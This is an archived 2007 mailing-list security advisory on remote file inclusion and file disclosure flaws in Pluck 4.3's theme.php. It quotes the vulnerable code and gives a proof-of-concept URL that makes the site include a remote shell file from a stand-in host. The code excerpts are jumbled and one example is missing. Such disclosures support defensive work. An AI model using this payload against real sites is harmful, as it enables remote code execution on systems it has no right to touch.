|
|||||||||||
|
Pluck 4.3 themes.php Remote File Inclusion and disclosure
From: <no-reply(at)aria-security.net>
Date: Thu Aug 02 2007 - 07:40:48 EDT Aria-Security Team
Pluck 4.3 Remote File Inclusion
/path/data/inc/theme.php if Register_global was set as ON then we can use the $dir variable for RFI (is_file($dir."/".$file)) $files[]=$file;
else
if($dirs) {
foreach ($dirs as $dir) {
include ("$dir/theme.php");
http://example.com/path/data/inc/theme.php?dir=http://site/shell.ext? fputs($file, "<?php \$themepref = \"$cont\"; ?>"); if Register_global was set as ON then we can use the $file variable for disclosure.
example:
Credits: Aria-Security Team
This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:10:42 EDT |
||||||||||
|
|||||||||||